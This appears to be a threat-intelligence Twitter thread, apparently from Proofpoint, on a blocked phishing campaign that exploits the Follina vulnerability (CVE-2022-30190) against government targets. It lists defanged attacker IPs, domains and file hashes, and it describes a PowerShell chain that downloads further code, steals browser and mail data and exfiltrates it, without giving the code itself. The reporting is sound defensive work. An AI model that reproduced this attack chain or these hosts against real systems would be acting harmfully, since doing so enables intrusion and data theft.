Proofpoint blocked a suspected state aligned phishing campaign targeting less than 10 Proofpoint customers (European gov & local US gov) attempting to exploit #Follina / #CVE_2022_30190.
This campaign masqueraded as a salary increase and utilized an RTF (242d2fa02535599dae793e731b6db5a2) with the exploit payload downloaded from 45.76.53[.]253. 
The downloaded Powershell script was base64 encoded and used Invoke-Expression to download an additional PS script (dbd2b7048b3321c87a768ed7581581db) from seller-notification[.]live.
This script checks for virtualization, steals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil to 45.77.156[.]179.
While Proofpoint suspects this campaign to be by a state aligned actor based on both the extensive recon of the Powershell and tight concentration of targeting, we do not currently attribute it to a numbered TA.
• • •
Missing some Tweet in this thread? You can try to
force a refresh
